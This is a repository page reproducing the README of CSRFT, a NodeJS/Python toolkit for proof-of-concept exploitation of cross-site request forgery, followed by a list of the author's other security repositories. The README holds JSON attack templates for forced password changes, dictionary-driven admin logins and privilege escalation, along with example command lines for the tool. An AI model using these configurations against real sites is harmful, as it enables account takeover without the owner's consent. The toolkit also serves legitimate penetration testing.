• Stars
    star
    174
  • Rank 219,104 (Top 5 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created almost 11 years ago
  • Updated over 10 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A lightweight CSRF Toolkit for easy Proof of concept

CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit

Introduction

Description

This project has been developed to exploit CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit. In few words, this is a simple HTTP Server in NodeJS that will communicate with the clients (victims) and send them payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.
**However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. **

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool

First, clone it :

$ git clone [email protected]:PaulSec/CSRFT.git

To make this project work, get the latest Node.js version here. Go in the directory and install all the dependencies:

npm install

Then, launch the server.js :

$ node server.js

Usage will be displayed :

Usage : node server.js <file.json> <port : default 8080>

More information

By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080.
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.

The index page displayed on the browser is accessible via : /views/index.ejs.
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?

The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :

  • conf folder : add your JSON configuration file with your configuration.
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : Folder containing all your dictionnaries for those attacks
  • lib : libs specific for my project (custom ones)
  • utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
  • server.js file - the HTTP server

Configuration file templates

GET Request with special value

Here is a basic example of JSON configuration file that will target www.vulnerable.com This is a special value because the malicious payload is already in the URL/form.

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "method": "GET", 
            "type_attack": "special_value", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

GET Request with dictionnary attack

Here is a basic example of JSON configuration file. For every entry in the dictionnary file, there will be a HTTP Request done.

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt", 
            "method": "GET", 
            "type_attack": "dico", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}

POST Request with special value attack

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html", 
            "method": "POST", 
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}

The form already includes the malicious payload. So it just has to be executed by the victim.

I hope you understood the principles. I didn't write an example for a POST with dictionnary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?

A scenario is composed of attacks. Those attacks can be simultaneous or at different time.

For example, you want to sign the user in and THEN, you want him to perform some unwanted actions. You can specify it in the JSON file.

Let's take an example with both POST and GET Request :

{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },          
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ] 
            }   
        ]
    }
}

You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand

Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can but it shoudn't be this complicated.

Steps to succeed :

1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do Dictionnary attack, add your dictionnary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json

B) I want to automate attacks really easily

To do so, I developed a Python script csrft_utils.py in utils folder that will do this for you.

Here are some basic use cases :

**GET parameter with Dictionnary attack : **

$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"

**POST parameter with Special value attack : **

$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value

Conclusion

This project has been released under License GPLv3. Feel free to contribute, send me feedbacks, or even fork the project !

It's still under development so there might be some bugs. Report it and I'll fix it as soon as possible.

More Repositories

1

awesome-sec-talks

A collected list of awesome security talks
3,999
star
2

awesome-windows-domain-hardening

A curated list of awesome Security Hardening techniques for Windows.
1,737
star
3

twittor

A fully featured backdoor that uses Twitter as a C&C server
Python
759
star
4

API-dnsdumpster.com

(Unofficial) Python API for https://dnsdumpster.com/
Python
274
star
5

HQLmap

(Deprecated) HQLmap, Automatic tool to exploit HQL injections
Python
223
star
6

Shodan-Firefox-Addon

Shodan Firefox Add-on
JavaScript
151
star
7

Shodan.io-mobile-app

Official repository for the Shodan.io mobile Application
TypeScript
138
star
8

crt.sh

(Unofficial) Python API for https://crt.sh
Python
129
star
9

osint-facebook-reset-password

Python util to retrieve full display name and profile picture from a single email address
Python
95
star
10

skype-osint

Python OSINT Tool to retrieve information from Skype
Python
74
star
11

API-EZTV.it

(Unofficial) Python API for the torrent website EZTV.it
Python
72
star
12

SPIPScan

SPIP (CMS) Scanner for penetration testing purpose written in Python
Python
69
star
13

metasearch-public

Stop searching for sample hashes on 10 different sites.
Python
65
star
14

API-malwr.com

(Unofficial) Python API for https://malwr.com/
Python
62
star
15

go-http-monitor

A (dead-simple) Golang utility allowing you to monitor HTTP endpoints
Go
38
star
16

cybercrime-tracker.net

(Unofficial) Python API for cybercrime-tracker.net
Python
37
star
17

API-InstagramLocation

Python OSINT Tool to retrieve pictures from a specific location using Instagram API
Python
35
star
18

pepito

Finds sensitive stuff in your git repository by specifying terms to look for
Python
31
star
19

Shodan-mattermost

Mattermost - Shodan Slash command
Python
30
star
20

VNWA

Vulnerable Node.js Web Application to pratice with your pentesting skills
JavaScript
21
star
21

API-namechk.com

(Unofficial) Python API for http://namechk.com
Python
19
star
22

HTTP-traceroute

HTTP-traceroute in Go
Go
18
star
23

ransomware-tracker

(Unofficial) Python API for http://ransomwaretracker.abuse.ch/tracker/
Python
16
star
24

API-netcraft.com

(Unofficial) Python API for http://netcraft.com
Python
15
star
25

SearchShodan

This is a basic example of how to search into Shodan using the ShodanAPI.
Python
15
star
26

exploitdb-json-api

JSON API for ExploitDB Website
JavaScript
15
star
27

API-checkusernames.com

(Unofficial) Python API for http://checkusernames.com
Python
13
star
28

XSS-Callback

A lightweight HTTP Server that exploits XSS victim's session automatically
JavaScript
11
star
29

SSLBlackList

(Unofficial) Python API for https://sslbl.abuse.ch/
Python
11
star
30

WhatHashIsIt

# Deprecated # "What hash is it?" service allows you to identify the hashing functions used of your hash(es) based on their characteristics.
JavaScript
10
star
31

Social-Markdown

"Dillinger.io clone" allowing live concurrent editing.
JavaScript
10
star
32

TVShowsManager

Basic manager to download your TV Shows automatically with EZTV.it website.
Python
9
star
33

recon-scan

Recon tool using Yatedo and Pipl
Python
9
star
34

paulsec.github.io

Repository containing my portfolio
HTML
8
star
35

censysio

Censysio Python wrapper
Python
7
star
36

Python-plugins

Quick Python project with a simple Plugin architecture
Python
7
star
37

API-HaveIBeenPwned

(Unofficial) Python API for HaveIBeenPwned Website
Python
7
star
38

what-is-this-browser

Python script that tells you what's the potential configuration behind a User-Agent
Python
6
star
39

markovobfuscate

Python library and tools to obfuscate data based on Markov models built off the same data
Python
6
star
40

drupal-enum-users

(Python) Quick script to enumerate users on a Drupal instance
Python
6
star
41

burito

# Deprecated # Burito, Hydra-like tool to audit Web application using forms containing server-side generated params.
Python
6
star
42

API-Email-Format

email-format.com (Unofficial) Python API
Python
5
star
43

Virus-Total-Dump

Python script that dumps behavourial information about a list of hashes
Python
5
star
44

API-Yatedo

(Unofficial) Python API for Yatedo Website
Python
5
star
45

shellpot-nodejs

Honeypot written in Node.js for the Shellshock vulnerability
JavaScript
4
star
46

filesharer-nodejs

File sharer based on Node.js using AES encryption for your files
JavaScript
4
star
47

API-ShouldIChangeMyPassword

(Unofficial) Python API for ShouldIChangeMyPassword Website
Python
4
star
48

node-ip-info

Retrieves information about a specific IP
JavaScript
4
star
49

Raspberry-APT

# Deprecated # Raspberry APT - Automatic Pwn Tool suite to perform automatic pentest.
Python
4
star
50

feedrss-python

Quick command line tool to retrieve RSS blog post ordered by published date
Python
3
star
51

slidecast

Python utility to show pictures in a slideshow on your chromecast
Python
3
star
52

JSONLogger

JSONLogger - HTTP Proxy that logs JSON HTTP Response in the console
JavaScript
3
star
53

API-Pipl

(Unofficial) Python API for Pipl Website
Python
3
star
54

wordpress-vulnscan-add-on

Mozilla Add-on that retrieves potential vulnerabilities based on the Wordpress website you're visiting
2
star
55

kafka-boilerplate-docker

Kafka boilerplate example with docker-compose
Python
2
star
56

clermontech-fastapi

Python
1
star
57

Telegram-bot

Python bot to control your server through Telegram
1
star
58

API-oldpiratebay

(Unofficial) Python API for Old Pirate Bay
Python
1
star